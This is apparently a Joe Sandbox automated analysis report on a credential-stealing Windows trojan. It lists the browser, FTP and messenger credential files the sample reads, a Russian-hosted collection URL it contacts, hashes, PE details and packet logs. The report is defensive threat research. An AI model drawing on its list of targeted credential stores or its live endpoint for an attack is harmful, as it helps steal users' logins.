Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\SpiMLVsYmg.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlml	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Show sources

Source: C:\Users\user\Desktop\SpiMLVsYmg.exe

File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter2	Path Interception	Path Interception	Masquerading1	OS Credential Dumping2	System Time Discovery2	Remote Services	Screen Capture1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information1	Credentials in Registry1	Security Software Discovery21	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Credentials In Files1	Process Discovery1	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery14	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SpiMLVsYmg.exe	30%	Virustotal		Browse
SpiMLVsYmg.exe	8%	Metadefender		Browse
SpiMLVsYmg.exe	17%	ReversingLabs	Win32.Trojan.Johnnie

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ck12339.tmweb.ru	5.23.51.54	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ck12339.tmweb.ru/reciver.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://ac.ecosia.org/autocomplete?q=	SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp	false	high
https://duckduckgo.com/chrome_newtab	SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp	false	high
https://duckduckgo.com/chrome_newtabo4	SpiMLVsYmg.exe, 00000000.00000002.346442652.00000000030A6000.00000004.00000020.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp, SpiMLVsYmg.exe, 00000000.00000002.349220889.0000000011DCE000.00000004.00000001.sdmp, SpiMLVsYmg.exe, 00000000.00000002.346442652.00000000030A6000.00000004.00000020.sdmp	false	high
http://ck12339.tmweb.ru/reciver.phps9l	SpiMLVsYmg.exe, 00000000.00000002.346575697.0000000004B03000.00000004.00000001.sdmp	false	high
https://duckduckgo.com/ac/?q=	SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp, SpiMLVsYmg.exe, 00000000.00000002.349220889.0000000011DCE000.00000004.00000001.sdmp, SpiMLVsYmg.exe, 00000000.00000002.346442652.00000000030A6000.00000004.00000020.sdmp	false	high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp	false	high
http://ck12339.tmweb.ru/reciver.phpc	SpiMLVsYmg.exe, 00000000.00000002.349232955.0000000011DD7000.00000004.00000001.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp	false	high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SpiMLVsYmg.exe, 00000000.00000002.346462437.00000000030C6000.00000004.00000020.sdmp	false	high
https://duckduckgo.com/chrome_newtabl	SpiMLVsYmg.exe, 00000000.00000002.349220889.0000000011DCE000.00000004.00000001.sdmp	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
5.23.51.54	ck12339.tmweb.ru	Russian Federation		9123	TIMEWEB-ASRU	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	376834
Start date:	27.03.2021
Start time:	08:14:25
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SpiMLVsYmg.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.phis.spyw.winEXE@1/0@1/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 57 Number of non-executed functions: 24
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Excluded IPs from analysis (whitelisted): 13.64.90.137, 40.88.32.150, 52.147.198.201, 2.23.155.186, 2.23.155.232, 13.88.21.125 Excluded domains from analysis (whitelisted): skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus15.cloudapp.net, skypedataprdcolwus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, 2-01-3cf7-0009.cdx.cedexis.net, download.windowsupdate.com, watson.telemetry.microsoft.com, a767.dspw65.akamai.net, wu-fg-shim.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, download.windowsupdate.com.edgesuite.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TIMEWEB-ASRU	PAY3646944800277778.doc	Get hash	malicious	Browse	92.53.96.228
	PAY3646944800277778.doc	Get hash	malicious	Browse	92.53.96.228
	fnDYJn4hXm.exe	Get hash	malicious	Browse	92.53.96.36
	yKp7wkfQEZ.exe	Get hash	malicious	Browse	92.53.96.36
	zENdMC2mFV.exe	Get hash	malicious	Browse	92.53.96.36
	xgrpSGUr7g.exe	Get hash	malicious	Browse	92.53.96.36
	OfSJvIEf5P.exe	Get hash	malicious	Browse	92.53.96.36
	vQBTkn3dvP.exe	Get hash	malicious	Browse	92.53.96.36
	SecuriteInfo.com.Trojan.Packed2.42850.8622.exe	Get hash	malicious	Browse	5.23.51.195
	6mwT86Mpvq.exe	Get hash	malicious	Browse	5.23.51.236
	Olga - Lean 'n' Lusty #3B Team Russia 1080p.exe	Get hash	malicious	Browse	188.225.39.122
	Copia De Pago_pdf.exe	Get hash	malicious	Browse	185.200.243.93
	f3ZcLUckTr.exe	Get hash	malicious	Browse	92.53.96.116
	ITRM5rN1Md.exe	Get hash	malicious	Browse	185.114.246.107
	i961SS7yvN.exe	Get hash	malicious	Browse	5.23.51.195
	8px7c8Cuep.exe	Get hash	malicious	Browse	5.23.51.195
	F4eUem6E98.exe	Get hash	malicious	Browse	92.53.116.135
	1piUorTcpc.exe	Get hash	malicious	Browse	5.23.51.195
	beZvm96NND.exe	Get hash	malicious	Browse	5.23.51.195
	gbDDlLcRvr.exe	Get hash	malicious	Browse	5.23.51.195

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.942220104709799
TrID:	Win32 Executable (generic) a (10002005/4) 99.92% Disk Image (Macintosh), GPT (4000/0) 0.04% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SpiMLVsYmg.exe
File size:	771072
MD5:	f56a39a0417c779c0b48fa7b2638cc58
SHA1:	351ad6d8775a69d06498dbc6953f366f6c5e11fc
SHA256:	97e799becef44ad19659b81b1d8604ec6888304efc73bb105ed233096ad20045
SHA512:	06a94e843792ee261facc3560009eb4fb2f3bdd4e3af77a65d27703d9a7aa2f6b0df520fe8eb3f5a4b81ee2d53a01bfc5fc9f04f93967ec6f10fadc6c4080616
SSDEEP:	12288:AZjsgH3jXcghkIof/3cUnvE3DdsRrpdvaBxJ5N8b4oX32c85/XWe9tO5B/uVJrtH:ANsgXDvhzof/3cUM3DdCfvaHJ5NC4E2b
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.. #t{s#t{s#t{s7.xr(t{s7.~r.t{s7..r1t{s...s"t{s..~r.t{s...r2t{s..xr;t{s7.zr(t{s#tzs.t{s..sr4t{s..yr"t{sRich#t{s...............

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x47f3e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6058E5EC [Mon Mar 22 18:46:04 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	dc508cc80a96e57a6c16e3b5a73469c0

Entrypoint Preview

Instruction
call 00007FDCACB69658h
jmp 00007FDCACB6922Dh
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007FDCACB693CBh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007FDCACB693BCh
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007FDCACB693BEh
add edx, 28h
cmp edx, esi
jne 00007FDCACB6939Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007FDCACB693ABh
push esi
call 00007FDCACB69B69h
test eax, eax
je 00007FDCACB693D2h
mov eax, dword ptr fs:[00000018h]
mov esi, 004B9420h
mov edx, dword ptr [eax+04h]
jmp 00007FDCACB693B6h
cmp edx, eax
je 00007FDCACB693C2h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007FDCACB693A2h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007FDCACB693B9h
mov byte ptr [004B9424h], 00000001h
call 00007FDCACB69958h
call 00007FDCACB6A4F6h
test al, al
jne 00007FDCACB693B6h
xor al, al
pop ebp
ret
call 00007FDCACB6F72Ch
test al, al
jne 00007FDCACB693BCh
push 00000000h
call 00007FDCACB6A4FDh
pop ecx
jmp 00007FDCACB6939Bh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [004B9425h], 00000000h
je 00007FDCACB693B6h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb5644	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbc000	0x4854	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb49a8	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb4a00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x93000	0x264	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x91f2d	0x92000	False	0.645997765946	data	6.76741722088	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x93000	0x233a6	0x23400	False	0.650446032801	data	6.85582486188	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb7000	0x4ea0	0x2200	False	0.200827205882	data	2.54706538538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0xbc000	0x4854	0x4a00	False	0.754011824324	data	6.63399846965	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
USER32.dll	EnumDisplayDevicesW, wsprintfA, GetSystemMetrics, ReleaseDC, GetDC, IsCharUpperW, wsprintfW
WTSAPI32.dll	WTSEnumerateProcessesW, WTSFreeMemory
GDI32.dll	SelectObject, CreateDIBSection, CreateCompatibleDC, DeleteDC, GetObjectW, DeleteObject, GetCurrentObject, BitBlt
KERNEL32.dll	GetEnvironmentStringsW, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetStringTypeW, GetConsoleOutputCP, WriteConsoleW, GetCommandLineW, GetCurrentProcessId, GetCPInfo, GetOEMCP, GetACP, WriteFile, DeviceIoControl, VirtualAlloc, SetFilePointer, CreateMutexW, WaitForSingleObject, ReleaseMutex, Sleep, GetLocalTime, lstrlenW, GetUserDefaultLocaleName, lstrlenA, GetSystemWow64DirectoryW, lstrcatW, GlobalAlloc, lstrcpyA, GlobalFree, GetComputerNameW, GlobalMemoryStatusEx, lstrcpyW, lstrcmpW, AreFileApisANSI, TryEnterCriticalSection, HeapCreate, HeapFree, EnterCriticalSection, GetFullPathNameW, GetDiskFreeSpaceW, OutputDebugStringA, LockFile, LeaveCriticalSection, InitializeCriticalSection, GetFullPathNameA, SetEndOfFile, UnlockFileEx, GetTempPathW, GetFileAttributesW, GetCurrentThreadId, UnmapViewOfFile, HeapValidate, HeapSize, MultiByteToWideChar, GetTempPathA, FormatMessageW, GetDiskFreeSpaceA, GetLastError, GetFileAttributesA, GetFileAttributesExW, OutputDebugStringW, FlushViewOfFile, WaitForSingleObjectEx, HeapReAlloc, CloseHandle, GetSystemInfo, HeapAlloc, HeapCompact, HeapDestroy, UnlockFile, GetProcAddress, LocalFree, LockFileEx, GetFileSize, DeleteCriticalSection, DecodePointer, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, WideCharToMultiByte, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, CreateFileMappingW, MapViewOfFile, QueryPerformanceCounter, GetTickCount, FlushFileBuffers, GlobalReAlloc, VirtualProtect, VirtualFree, LoadLibraryA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, IsValidCodePage, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, EncodePointer, RaiseException, CreateThread, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, GetModuleFileNameW, ExitProcess, CompareStringW, LCMapStringW, GetTimeZoneInformation, ReadFile, SetFilePointerEx, GetFileType, GetConsoleMode, ReadConsoleW, CreateFileW, SetStdHandle, FindClose, FindFirstFileExW, FindNextFileW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
03/27/21-08:15:14.352347	ICMP	384	ICMP PING	192.168.2.6	2.23.155.186
03/27/21-08:15:14.384590	ICMP	449	ICMP Time-To-Live Exceeded in Transit	84.17.52.126	192.168.2.6
03/27/21-08:15:14.385743	ICMP	384	ICMP PING	192.168.2.6	2.23.155.186
03/27/21-08:15:14.418238	ICMP	449	ICMP Time-To-Live Exceeded in Transit	149.11.89.129	192.168.2.6
03/27/21-08:15:14.418591	ICMP	384	ICMP PING	192.168.2.6	2.23.155.186
03/27/21-08:15:14.451658	ICMP	449	ICMP Time-To-Live Exceeded in Transit	130.117.49.165	192.168.2.6
03/27/21-08:15:14.452469	ICMP	384	ICMP PING	192.168.2.6	2.23.155.186
03/27/21-08:15:14.490578	ICMP	449	ICMP Time-To-Live Exceeded in Transit	130.117.0.18	192.168.2.6
03/27/21-08:15:14.491601	ICMP	384	ICMP PING	192.168.2.6	2.23.155.186
03/27/21-08:15:14.536908	ICMP	449	ICMP Time-To-Live Exceeded in Transit	154.54.36.53	192.168.2.6
03/27/21-08:15:14.537434	ICMP	384	ICMP PING	192.168.2.6	2.23.155.186
03/27/21-08:15:14.585042	ICMP	449	ICMP Time-To-Live Exceeded in Transit	130.117.15.66	192.168.2.6
03/27/21-08:15:14.585981	ICMP	384	ICMP PING	192.168.2.6	2.23.155.186
03/27/21-08:15:14.650186	ICMP	449	ICMP Time-To-Live Exceeded in Transit	195.22.208.117	192.168.2.6
03/27/21-08:15:14.650785	ICMP	384	ICMP PING	192.168.2.6	2.23.155.186
03/27/21-08:15:14.720968	ICMP	449	ICMP Time-To-Live Exceeded in Transit	93.186.128.39	192.168.2.6
03/27/21-08:15:14.721585	ICMP	384	ICMP PING	192.168.2.6	2.23.155.186
03/27/21-08:15:14.781085	ICMP	408	ICMP Echo Reply	2.23.155.186	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 27, 2021 08:15:22.604247093 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.698654890 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.700282097 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.700305939 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.700326920 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.794217110 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.794327021 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.794409990 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.794531107 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.794562101 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.794644117 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.794858932 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.794951916 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.795141935 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.795223951 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.795346022 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.795471907 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.795871973 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.795994043 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.796015024 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.796089888 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.796217918 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.796283960 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.796400070 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.796471119 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.888600111 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.888729095 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.889111042 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.889136076 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.889153957 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.889173031 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.889199972 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.889374018 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.889590025 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.890022039 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.890166998 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.890304089 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.890458107 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.890572071 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.982882977 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.983007908 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.983592987 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.983613968 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.983706951 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.983730078 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.983877897 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.984009981 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.984072924 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.984175920 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.984627962 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.984658957 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.984745979 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.984792948 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.984802008 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.985043049 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.985239029 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.985467911 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:22.985568047 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:22.985795975 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.077239990 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.077254057 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.077271938 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.077281952 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.077390909 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.077462912 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.077603102 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.077614069 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.077711105 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.077754974 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.077943087 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.077966928 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.078047037 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.078078985 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.078181982 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.078181982 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.078191996 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.078207016 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.078253031 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.078358889 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.078361034 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.078370094 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.078443050 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.078454971 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.078610897 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.078751087 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.078768969 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.078792095 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.078838110 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.078861952 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.078919888 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.078974009 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.078984976 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.078999996 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.079061985 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.079111099 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.079124928 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.079207897 CET	80	49704	5.23.51.54	192.168.2.6
